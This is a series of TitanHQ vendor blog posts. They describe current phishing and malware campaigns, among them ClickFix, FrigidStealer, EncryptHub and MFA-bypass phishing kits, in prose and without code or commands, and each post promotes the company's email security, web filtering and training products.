Traffic can be driven to these doctored or fake installers via links in emails, or malvertising and search engine poisoning. With malvertising and search engine poisoning, cybercriminals target key search terms, such as “free online file converter.” The URLs are made to appear legitimate, such as mimicking a genuine tool and transposing a couple of letters, using hyphenated domain names, or subdomains on an existing site. The site content often appears professional and can be difficult for web users to identify as malicious.

In addition to bundling malware with legitimate software, there are online versions of these tools. The user is instructed to upload the file they wish to convert, and the converted file is downloaded. There have been instances where the converted file is added to a zip file for download, but rather than the converted file, an executable file is delivered, such as a .js file. Attempting to open the file triggers the installation of malware such as a remote access trojan, keylogger, banking trojan, or malware downloader. The popular malware download Gootloader has been observed being delivered this way. A Gootloader infection often leads to the delivery of a variety of malware payloads such as banking trojans, information stealers, and post-exploitation tools such as Cobalt Strike beacons.

Due to the increasing use of these tactics, it is important to incorporate them into your security awareness training programs to make users aware of the risks of using free file conversion tools. Before any such tool is used, it is important to conduct research to make sure the tool provider is genuine, and to scan any downloaded installer or converted file with antivirus software. Busy employees who need to quickly convert a file into a different format can easily fall victim to these scams.

In addition to raising awareness of the threat, businesses should consider restricting the types of files that can be downloaded from the Internet. This is easy with WebTitan, a powerful DNS-based web filter that prevents access to malicious websites and blocks unauthorized file downloads from the Internet. WebTitan can be configured to prevent certain employees (non-IT staff, for instance) from downloading executable file types, thereby neutralizing the threat. In addition to serving as an extra layer of protection against malware, WebTitan can also help to curb shadow IT – software installations unknown to the IT department. While these software installations may not contain any malware, they can easily introduce risks and vulnerabilities that can be exploited by hackers.

Give the TitanHQ team a call today to find out more about WebTitan and how it can improve security at your business, and for more information on the SafeTitan security awareness training and phishing simulation platform. TitanHQ also offers antispam software and a Microsoft 365 anti-phishing solution for blocking phishing threats. In recent independent tests, the engine that powers these two solutions achieved top spot for malware, phishing, and spam blocking out of all tested solutions with a perfect 100% block rate in each category and a 0.0% false positive rate.

Three Easy Ways to Improve Your Phishing Defenses

Phishing, and especially email phishing, is the most common attack vector used by cybercriminals and attacks continue to increase year after year. The latest data suggests that around 1.2% of all emails are malicious, which equates to around 3.4 billion malicious emails a day. Threat actors use email to distribute malware, drive traffic to malicious sites to harvest credentials and perform a wide range of scams, including business email compromise, the costliest type of cybercrime, often resulting in millions in losses.

While there are many ways that businesses can be attacked and many steps that can be taken to improve security, ensuring your defenses against email attacks are up to scratch is the best way of improving your security posture. Fortunately, TitanHQ has three easy-to-implement solutions that can greatly improve your defenses against the growing email and phishing threat, all of which are available on a free trial so you can put them to the test to see the difference they make.

Block More Threats with an Advanced Email Filtering Service

SpamTitan is an advanced spam filtering service that is quick and easy to implement, provides exceptional protection against all forms of email attacks, and does not require a degree in cybersecurity to use and maintain. The ease of use of the solution is one of the reasons the solution is popular with businesses from small mom-and-pop stores to large enterprises.

The SpamTitan cloud-based anti-spam service provides cutting-edge protection through a barrage of front-end tests, AI and machine learning-powered detection, twin antivirus engines, and email sandboxing. Suspicious files are sent to the sandbox to be safely detonated and subjected to in-depth behavioral analysis, helping to detect and block zero-day malware threats. In independent tests by VirusBulletin in Q3 2024, SpamTitan was rated in joint first place for detection, sole first place in Q4 2024 with a 100% malware catch rate, 100% phishing catch rate, and a 99.98% spam catch rate, and in February 2024, SpamTitan achieved a perfect score across the board, blocking all threats in the test.

Provide Effective Security Awareness Training to Your Workforce

Technical safeguards will block the vast majority of email threats, but it is inevitable that some threats will reach their intended targets. All it takes is for one employee to respond to a phishing email for a company to suffer a costly data breach or ransomware attack. It is vital that human defenses are strengthened by providing comprehensive security awareness training.  The most effective training programs run continuously, with employees given training regularly throughout the year. Only through regular training will you be able to develop a security culture, where employees are constantly looking for potential threats and are conditioned to report suspicious emails to the security team.

The SafeTitan security awareness platform includes an extensive library of enjoyable and engaging training modules on all aspects of security, with each module lasting no longer than 10 minutes for maximum engagement. The platform makes it easy to create training programs for the workforce, tailored for different roles in the organization, and automate those programs so they run continuously throughout the year. Training should be reinforced using phishing simulations, which can be easily created and automated through the SafeTitan platform. When employees fail a phishing simulation, relevant training is generated in real-time to ensure it is delivered when it is likely to have the maximum effect on changing employee behavior.

Improve Microsoft 365 Security with PhishTitan

PhishTitan is an advanced cloud-based anti-phishing solution for Microsoft 365 powered by the same engine behind the award-winning SpamTitan anti-spam service. The solution has been developed to be integrated seamlessly with Microsoft 365 to augment Microsoft’s EOP and Defender protections and catch the threats that these solutions often miss to give true defense-in-depth security. Like SpamTitan, PhishTitan adds layers of analysis and machine learning models to provide cutting-edge protection against phishing. PhishTitan scans all internal and external emails, rewrites URLs to detect links to malicious sites, automatically blocks phishing links in emails to prevent clicks, and provides time-of-click protection by inspecting and evaluating URLs in real-time to detect changes to the destination URL after the emails have been delivered.

PhishTitan adds banners to emails from external sources, helping to combat spoofing and alerting the recipient to take extra care, and also incorporates protection against QR code phishing – quishing – which is growing in prevalence and capable of defeating many email security solutions. The platform also includes an auto-remediation feature, allowing administrators to rapidly remediate threats from users’ inboxes, including cross-tenant features for detection and response by MSPs. One of the main complaints from Microsoft 365 users is the number of phishing emails that bypass defenses; however, with the additional layers of protection provided by PhishTitan, businesses will be better protected against phishing threats.

If you want to improve your defenses against email threats, give the TitanHQ team a call or take advantage of a free trial of TitanHQ solutions to put them to the test in your own environment.

ClickFix Phishing Scam Targets Hospitality Sector Workers

Individuals in the hospitality sector are being targeted in a sophisticated phishing scam that uses the ClickFix phishing technique. The ClickFix campaign has been active since at least December 2024 and is being conducted on targets in North America, Europe, Oceania, South and Southeast Asia.

The phishing emails impersonate booking.com and target staff at hotels, guest houses, and other accommodation providers that are likely to work with booking.com. A wide range of emails have been associated with this ClickFix campaign, including emails that appear to have been sent by prospective guests about the accommodation asking for advice, notifications from booking.com about complaints from guests about previous stays, requesting feedback on the guests’ comments, and security notifications from booking.com about suspicious login attempts.

While the lures are varied, they all use social engineering techniques to trick the recipient into clicking a link, which directs the user to a web page with a fake CAPTCHA overlayed on a visible background that appears to be the Booking.com website. The link may be added to the message body using anchor text to make it appear that the link is legitimate, or in some of the emails, the link is added to a PDF file attachment in an effort to bypass email security solutions.

When the user attempts to complete the CAPTCHA prompt, they are advised of an error and are told they must use a keyboard shortcut (Windows key + R), then CTRL + V to paste a command into the Windows Run window, and press Enter to execute that command. The command copied to the clipboard will download and launch malicious code through mshta.exe, a legitimate Windows process. If the command is executed, it will lead to the delivery of malware such as AsyncRAT, VenomRAT, NetSupport RAT, Danabot, XWorm, and Lumma Stealer. Victims may get a cocktail of malware installed on their device.

The campaign is being run by a threat actor tracked by Microsoft Threat Intelligence as Storm-1865. Storm-1865 is a financially motivated threat actor that primarily engages in payment data theft and fraudulent charges to victims’ accounts. After achieving its aims, the group may sell access to victims’ devices to other threat actors. Previous campaigns have used similar techniques and have involved messages sent through vendor platforms such as travel agencies, e-commerce platforms, and email services such as Gmail and iCloud mail.

The ClickFix technique was first identified in October 2023 and has been adopted by several different threat actors including financially motivated cybercriminal groups and nation state actors from Russia and North Korea. The lures and malware may differ, but all use social engineering to trick the victim into running a command to fix a fictitious technical issue.

Businesses should ensure they have appropriate defenses to block phishing emails, as the ClickFix technique has proven to be highly effective. TitanHQ offers two solutions for blocking phishing attempts – the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 users.  The engine that powers both of these solutions was rated #1 out of all tested solutions in the Q4, 2024 tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.98% of spam emails. In the February 2025 tests, TitanHQ had a perfect score, blocking 100% of malware, phishing, and spam emails with a 0% false positive rate.

SpamTitan incorporates email sandboxing for behavioral analysis of emails and machine-learning algorithms to identify suspicious emails, ensuring an incredibly high detection rate. PhishTitan adds an additional layer of protection for Microsoft 365 accounts, augmenting Microsoft’s protections to identify and block the threats that Microsoft misses. Businesses should also ensure they provide security awareness training to the workforce and conduct phishing simulations of the ClickFix phishing technique. TitanHQ can help in this area with the SafeTitan security awareness training and phishing simulation platform. Call TitanHQ today for more information on phishing defense, or take advantage of the free trial of all of these solutions.

Fake Browser Update Campaign Delivers FrigidStealer Malware to Mac Users

There has been a surge in infostealer malware infections, with detections up almost 60% from the previous year. Infostealers gather system information, stored files, and sensitive data and exfiltrate the information to their command and control server. Once installed, they can remain undetected for long periods of time, exfiltrating sensitive data such as usernames and passwords by logging keystrokes, with some variants capable of taking screenshots and capturing audio and video by taking control of the microphone and webcam.

The majority of infostealers are used to attack Windows systems; however, a new infostealer called FrigidStealer has been identified that is being used to target Mac users. FrigidStealer is capable of stealing saved cookies, password-related files in the Safari and Chrome browsers, and login credentials, along with cryptocurrency wallet credentials, Apple Notes containing passwords, documents, spreadsheets, text files, and other sensitive data from the user’s home directory. The gathered data is added to a compressed file in a hidden folder in the user’s home directory and is exfiltrated to its command and control server.

The threat actor behind the campaign distributes FrigidStealer under the guise of important web browser updates on compromised websites. The threat actor injects malicious JavaScript into the HTML of the webpage which generates a fake browser update notification to website visitors. The notifications warn the user that they must update their browser to continue to view the page, with the displayed notification tailored to the browser in use.

The notifications look professional, include the appropriate logos for either Google Chrome or Safari, and contain an update button that the user must click to proceed. Clicking the button will trigger the download of an installer (DMG file), which must be manually launched. The user is required to enter their password to get around macOS Gatekeeper protections. If the password is entered, the file is executed and FrigidStealer is delivered.

A similar campaign is being conducted targeting Windows users. The Windows campaign uses similar techniques, although it tricks the user into downloading and executing an MSI installer, which delivers one of two different info stealers, Lumma Stealer or DeerStealer. The threat actor is also targeting Android devices in a similar way, delivering an APK file that contains the Marcher banking Trojan.

With infostealer infections soaring, businesses need to make sure they have the right security solutions in place and should be providing regular security awareness training to the workforce. Employees should be instructed to never download browser updates when prompted to do so on websites or run any suggested commands on their devices, as the updates and commands are likely to be malicious.

A web filter is strongly recommended for controlling access to the Internet and blocking visits to malicious websites. The WebTitan DNS filter can used to protect users on or off the network and is constantly updated with threat intelligence on new malicious websites. If an attempt is made to visit a known malicious website, that attempt will be blocked. The web filter can also be configured to block file downloads from the internet by file type, allowing IT teams to prevent employees from downloading executable files.

While this is a web-based campaign, information stealers are commonly distributed in phishing emails, either through malicious attachments or embedded hyperlinks. TitanHQ’s SpamTitan cloud-based anti-spam service is a powerful AI-driven email security solution with email sandboxing and advanced threat detection capabilities. SpamTitan outperformed all other tested solutions in recent tests by VirusBulletin, blocking 100% of phishing emails and 100% of malware.

TitanHQ Achieves Perfect Performance in February Virus Bulletin Tests

TitanHQ’s SpamTitan and PhishTitan solutions achieved perfect scores in the Virus Bulletin tests in February, blocking 100% of phishing emails, 100% of spam emails, and 100% of malware, with a 0% false positive rate. The unbeatable test scores in the latest round of tests follow impeccable scores in Q4, 2024, when the engine that powers the SpamTitan and PhishTitan solution ranked top out of all tested email security solutions with a 100% phishing and malware detection rate, and a 0.00% false positive rate. The high scores in Q4, 2024 saw TitanHQ ranked in 1st place for overall score, beating all other market-leading anti-spam software solutions including the anti-spam solutions from Mimecast, N-Able, Fortinet, Sophos, and others. In the previous quarter, TitanHQ ranked joint first. The strong performance in the tests earned TitanHQ its third consecutive VBSpam+ award.

Virus Bulletin is a highly respected security information portal and certification body that has earned an excellent reputation among the information security community by providing independent intelligence about the latest global threats. Virus Bulletin has been conducting regular benchmarking tests of security solutions for more than 20 years, with the test results giving IT security professionals invaluable information on the most effective security solutions to deploy to stop malware and phishing threats.

The latest round of tests was conducted over 16 days in February, with the SpamTitan and PhishTitan solutions blocking all threats and spam emails. The final results for Q1, 2025 are due to be announced at the end of March, with TitanHQ on track to earn its fourth consecutive VBSpam+ certification. “We’re excited to have significantly exceeded the industry benchmark in these interim results,” said Ronan Kavanagh, CEO at TitanHQ. “We’re now on track to receive a fourth consecutive VB+ award in Q1. These results highlight our relentless dedication to delivering top-tier email security, and we will continue safeguarding our clients against emerging cyber threats.”

The exceptional detection rates have prompted many managed services providers to migrate to TitanHQ from other solutions, keen to ensure their clients get the very best protection. Not only does TitanHQ deliver immediate and substantial threat mitigation, all solutions have been developed from the ground up to meet all the needs of MSPs, ensuring exceptional protection with minimal management overhead.

The SpamTitan spam filtering service includes a spam filter for incoming mail, an outbound spam filter, email sandboxing, dual antivirus engines, malicious link detection, and machine learning-based detection, ensuring exceptional protection from the full range of email threats. The next-generation email sandbox detects malware based on its behavior, allowing novel malware threats to be detected that signature-based detection misses while only causing minimal delays to message delivery. In the tests, TitanHQ was in the green for all speed tests.

If you want the very best in threat protection and exceptional value for money, why not make the switch to TitanHQ. Give the team a call today to find out more or take advantage of the free trial and see the difference TitanHQ solutions make.

Researchers Confirm Massive Threat From Information Stealing Malware

Cybercriminals have extensively used ransomware in their attacks on businesses, government entities, and critical infrastructure, and while these attacks often make headline news and cause massive disruption, there is a much more common malware threat – Information stealers.

Information stealers are malware that is silently installed on devices that can remain undetected for long periods of time. These types of malware have many different capabilities and can serve as downloaders for other malicious payloads, but their main function is information theft. Information theft is achieved in several ways, depending on the malware variant in question. These malware types often have keylogging capabilities and can record keystrokes as they are entered on the keyboard, allowing sensitive information such as usernames and passwords to be captured. They can often record audio from the microphone, take control of the webcam and record video, and take screenshots. They can also steal browser histories, cookies, and other sensitive information.

The information stolen from the victim allows the threat actor to conduct follow-on attacks, access accounts and steal further sensitive data, access and drain financial accounts, or commit identity theft and other types of fraud. Information stealers can also provide a threat actor with access to a device, and that access is often sold to specialized cybercriminal groups such as ransomware actors. Many hackers now act as initial access brokers, using information stealers to gain access before selling that access to other cybercriminal groups.

Information stealers such as Lumma, AgentTesla, FormBook, Redline, and StealC have been increasingly used in recent years, especially last year. Check Point observed a 58% increase in attacks from the previous year, and a report from the threat intelligence firm KELA suggested that lists of credentials obtained from information stealers are being shared on cybercrime forums. The credential lists included billions of logins that had been captured from infected devices, which, according to KELA, included around 4.3 million devices, of which around 330 million credentials had been stolen. An estimated 40% were corporate credentials.

The breach notification service, Have I Been Pwned (HIBP), has recently added 284 million compromised accounts to the service. The credentials were identified from chats on a Telegram channel called ALIEN TXTBASE, with the data obtained from information stealer logs. HIBP founder Troy Hunt said the stealer logs included 23 billion rows of data with 493 million unique website and email address pairs and around 284 million unique email addresses. Hunt said 244 million passwords were not previously known to the HIBP service, with 199 million already in its database.

The extent to which these malware variants are used, and the increase in use in 2024, clearly demonstrates the importance of advanced malware protection and the sheer number of compromised credentials suggests many businesses have been infected with information stealers. The problem for businesses is that these malware variants can be difficult to identify, as new versions are constantly being released. Traditional antivirus software is signature-based, which means it can only detect known malware. When new malware is identified, a signature of that malware is obtained and fed into antivirus software. If a malware signature is not in the software’s definition list, it will not be detected. There are several ways that these information stealers are distributed, with email being one of the most common. They can also be downloaded from the internet from malicious websites in drive-by downloads or installed along with pirated software or doctored versions of legitimate software installers.

Defending against information stealers requires a combination of measures – a defense-in-depth approach, with multiple overlapping layers of security. Given the high volume of infections stemming from email, businesses need a spam filter to block malicious emails. Antispam software will block many malicious emails; however, an antispam server must have advanced antimalware defenses. That means traditional signature-based detection and advanced behavioral detection to ensure previously unseen malware is identified and blocked.

SpamTitan uses dual anti-virus engines for detecting known threats and a next-generation email sandbox for behavioral analysis. If standard checks are passed, suspicious messages are sent to the sandbox – a safe environment where they are detonated and their behavior is analyzed. This vastly improves the detection rate, and in recent independent tests, SpamTitan outperformed all other tested email security solutions and had a 100% malware detection rate.

Security awareness training needs to be provided to the workforce to ensure that employees have the skills to recognize and avoid threats, no matter where they are encountered. Through training, employees should be conditioned to always report potential threats to their security team, and businesses can promote security best practices and eradicate risky behaviors. TitanHQ offers businesses a comprehensive training and phishing simulation platform – SafeTitan – that has been shown to be highly effective at improving employees’ security awareness.

Many malware infections occur via the Internet, and while training can reduce risk, a technical security solution is required to block threats. WebTitan is a DNS-based web filter that is used to block access to known malicious websites, assess websites in real-time for malicious content, block certain file downloads from the Internet, and restrict the sites and web pages employees can access.

With these three security solutions in your arsenal, you will be able to significantly improve your security posture and block information stealers and other threats. Give the TitanHQ team a call today to find out more or take advantage of a free trial of these solutions.

Smishing and Vishing Used by Ransomware Group for Initial Access to Corporate Networks

A ransomware group called EncryptHub has been accelerating attacks and is now known to have breached the networks of more than 600 organizations worldwide. EncryptHub has been active since June 2024 and gains initial access to victims’ networks via spear phishing attacks, with initial contact made via SMS messages rather than email.

The group impersonates commonly used corporate VPN products such as Palo Alto GlobalProtect and Cisco AnyConnect as well as Microsoft 365, and drives traffic to its malicious domains by making contact via personalized SMS messages (smishing) or the phone (vishing).

If vishing is used and the victim is contacted by phone, EncryptHub impersonates a member of the IT helpdesk and uses social engineering techniques to trick them into disclosing their VPN credentials. The phone number is spoofed to make it appear that the call is coming from inside the company or Microsoft Teams phone numbers are used. The victim is told that there is a problem with the corporate VPN that needs to be resolved, and if the scam works, the user is sent a link via SMS that directs them to a domain that resembles the VPN solution used by that company. If the user enters their credentials, they are used in real-time to log in, and if there are any multifactor authentication prompts, the threat actor is able to obtain them on the call. After successfully gaining access, the user is redirected to the genuine login page for their VPN, and the call is terminated.

Another tactic used by the group involves SMS messages with a fake Microsoft Teams link with the goal of capturing their Microsoft 365 credentials. The user is directed to a Microsoft Teams-related login page and the threat actor exploits Open URL parameters on microsoftonline.com to harvest email addresses and passwords, while the user believes they are interacting with the legitimate Microsoft service. Once access is gained, the group uses PowerShell scripts and malware to gain persistence, then moves laterally, steals data, deploys the ransomware payload, and issues a ransom demand.

The group’s tactics are highly effective, as in contrast to spear phishing via email, it is difficult to block the initial contact via SMS or over the phone. The key to preventing these attacks is improving the security awareness of the workforce and using a web filter to prevent the phishing domains from being accessed by employees. TitanHQ’s web filter, WebTitan, is a DNS-based web filtering solution that is constantly updated with the latest threat intelligence from multiple sources to provide up-to-the-minute protection against new phishing domains. Any attempt to visit a known phishing domain or other malicious site will be blocked, with the user directed to a locally hosted block page.

Regular security awareness training for the workforce is vital to teach security best practices and raise awareness of the tactics used by cybercriminals to breach corporate networks. With the SafeTitan security awareness training platform, businesses can easily create training programs tailored for individuals, roles, and departments, and automate those campaigns so they run continuously throughout the year, delivering training in small chunks on a weekly or monthly basis. It is easy to incorporate new training in response to changing threat actor tactics to increase awareness of specific threats. The platform also includes a phishing simulator for running phishing simulations on the workforce to reinforce training and identify knowledge gaps. If a phishing simulation is failed, training is automatically delivered to the user in real time, relevant to the threat they failed to identify. This ensures training is delivered at the point when it is likely to be most effective.

For more information on TitanHQ solutions, including the WebTitan DNS filter and the SafeTitan security awareness training platform, give the TitanHQ team a call today. Both solutions are available on a free trial to allow you to assess them fully before making a purchase decision.

Cracked Software Used to Deliver Information Stealing Malware

Information stealers are one of the most common ways that initial access is gained to business networks, and the extent to which these malware variants are used is alarming. According to Hudson Rock, an estimated 30 million computers have been compromised using information stealers in the past few years and Check Point reports that infections have increased by 58% in the past year.

Cybercriminals specialized in infecting devices distribute their information stealers, which collect sensitive data such as session cookies and login credentials, allowing access to be gained to corporate networks. Oftentimes, the cybercriminals then sell that access to other cybercriminal groups, acting as initial access brokers. The groups that they work with have their own specialisms, such as conducting ransomware attacks. These malware variants are capable of stealing large amounts of sensitive information from compromised devices. They can exfiltrate files, obtain web browser data and passwords, and steal cryptocurrency extensions. Infection with an information stealer can result in the large-scale theft of data, compromised accounts, and further attacks, including ransomware infections.

Security researchers have recently uncovered a new campaign that distributes information stealers such as Lumma and ACR Stealer via cracked versions of legitimate software. The pirated software can be obtained and used free of charge, albeit illegally, and is available through warez sites and from peer-to-peer file-sharing networks. The installers have been packaged to silently deliver an information stealer. Cybercriminals often use SEO poisoning to get their malicious sites to appear high in search engine listings or add malicious adverts to legitimate ad networks (malvertising) to get them to appear on high-traffic websites. The adverts direct internet users to download sites.  Initial contact is also made via email, with workers tricked into opening malicious files that launch scripts that deliver the information stealer payload or direct users to websites where the malware is downloaded under the guise of a legitimate program. Contact may also be made via the telephone, with the criminals impersonating IT helpdesk staff and tricking employees into downloading the malware.

Defending against information stealers means improving defenses against all these tactics, and that means there is no single cybersecurity solution or measure that will be effective against them all, but there are three important cybersecurity measures that you should strongly consider: anti-spam software, a DNS filter, and security awareness training.

Anti-spam Software

Many malware infections occur via email, either through attachments containing malicious scripts or via hyperlinks to websites from which malware is downloaded. When malicious attachments are used, they are not always detected by antispam software and can easily reach end users. To improve detection, email sandboxing is required, where messages are sent to the sandbox for deep inspection. In the sandbox, hyperlinks are also followed to identify any downloads that are triggered. If malicious actions are confirmed, the messages are quarantined and are not deleted.

A DNS Filter

Since many malware infections occur via the Internet, businesses should consider web filtering software. DNS-based web filters allow businesses to control the web content that users can access, block certain file downloads from the internet, and assess web content in real-time for malicious content, without the latency associated with other types of web filters. A DNS filter can prevent users from accessing malicious content and will reduce reliance on employees recognizing and avoiding threats.

Security Awareness Training

Anti-spam software and DNS filters will greatly improve security; however, employee security awareness also needs to be improved. Through regular security awareness training, businesses can eliminate risky practices and train employees how to recognize and avoid threats. By providing training continuously in small chunks throughout the year, businesses can develop a security culture and significantly improve their human defenses.

TitanHQ offers multi-award-winning cybersecurity solutions for SMBs and managed service providers (MSPs) that are easy to implement and offer exceptional protection, including the SpamTitan cloud-based spam filtering service, the WebTitan DNS filter, and the SafeTitan security awareness training and phishing simulation solution. All three solutions are available on a free trial to allow you to see for yourself the difference they make before making a purchase decision. Give the TitanHQ team a call to find out more and to discuss these options, and take the important first step toward improving your defenses.

New Phishing Kit Bypasses MFA in Real-Time

A growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.

The Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to instantly access the user’s account.

The user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the user is directed to a server and is presented with what appears to be a legitimate login page. The page has valid SSL certificates, so no security warnings are generated. The server acts as a reverse proxy, and when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time.

The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted as they are entered by the user. When session cookies are generated, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. The kit also includes bulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately before the user suspects anything untoward has happened.

Phishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.

In addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. That means training is delivered at the point when it is likely to be most effective at correcting behavior.

Give the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.

SVG Files Increasingly Used in Phishing Campaigns

Security awareness training programs teach employees to be constantly alert to potential phishing emails, especially emails with file attachments. Most employees will be aware that Office documents can contain macros, which if allowed to run, can download malware onto their device, but they are likely much less suspicious about image files. Image files are far less likely to be malicious; however, there is an image file format that can contain malicious content – SVG files – and they are increasingly being used in phishing campaigns.

An SVG or Scalable Vector Graphics file is XML-based, which means it can be scaled without loss of quality. These file types are commonly used for icons and buttons and are extensively used in graphic design, including for company logos. Image files may seem pretty innocuous, but one of the properties of SVG files, unlike non-scalable image formats such as Jpegs, is they can be created to include scripts, anchor tags, and other types of active web content. When opening an SVG file, unless a computer has been configured to open the file using a specific image program, the file will be opened in a web browser.

One campaign incorporated the SharePoint logo and advised the user that a secure document has been shared through Microsoft SharePoint. The image included a folder icon with the file name “Updated Compensation and Benefits”, and an “open” button that the user is encouraged to click. Clicking that button directs the user to a phishing page where they must enter their credentials to view the file. Those credentials will be captured and used to access the user’s account. Many phishing campaigns that use SVG file attachments include hyperlinks that direct the user to a site that spoofs a well-known brand such as Microsoft to harvest credentials, such as displaying a fake Microsoft 365 login page. These phishing pages have been designed to be indistinguishable from the genuine login prompt and may even autofill the user’s login name into the login prompt.

There are two main advantages to using SVG files in phishing campaigns. First and foremost, the file is less likely to be flagged as malicious by an email security solution, many of which do not analyze the content of SVG files, therefore ensuring messages containing SVG files are delivered to an end user’s inbox. Secondly, since awareness of malicious SVG files is low, the targeted individuals may be easily tricked into clicking on the hyperlink. The use of SVG files in phishing campaigns is becoming more common, and this trend is likely to continue in 2025. Businesses should ensure that they have adequate defenses to block these attacks, which should consist of advanced anti-spam software to block these phishing emails, and security awareness training content should be updated to raise awareness of this attack technique.

SpamTitan is an advanced spam filtering service from TitanHQ that has been proven to block more phishing emails than other email security solutions. SpamTitan was recently put to the test by VirusBulletin and outperformed all other tested anti-spam software solutions, blocking 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. Machine learning algorithms ensure that the solution gets better over time, extensive threat intelligence feeds keep the solution automatically updated with up-to-the-minute threat intelligence, and a next-generation email sandbox provides exceptional protection against malware. When coupled with the SafeTitan security awareness training and phishing simulations to improve employee awareness, businesses will be well protected against phishing, malware, and other email-based attacks. Give the TitanHQ team a call today for more information about these solutions or take advantage of a free trial and see for yourself the difference these solutions make to your security posture.

Email Bombing: What You Need to Know to Protect Your Business

Investigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.

With email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding a user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam issue then impersonates a member of the IT department and claims they can fix the problem, with content often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.

There are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.

An spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4, 2024, tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.

Businesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.

Microsoft 365 Accounts Targeted Using Sneaky 2FA Phishing Kit

As the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.

The attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity measure – If passwords are compromised, access to accounts can be prevented. Unfortunately, multifactor authentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages offered to cybercriminals that cover all aspects of phishing. If purchased, phishing campaigns can be conducted with minimal effort as the phishing kit will generate copies of websites that impersonate well-known brands, the infrastructure for capturing credentials, and templates for phishing emails. After paying a fee, all that is required is to supply the email addresses for the campaign, which can be easily purchased on hacking forums.

Some of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are used to circumvent MFA access controls during subsequent authentication. One of the latest phishing kits to be identified is has been dubbed Sneaky 2FA. The kit was first identified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia. The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA phishing kit.

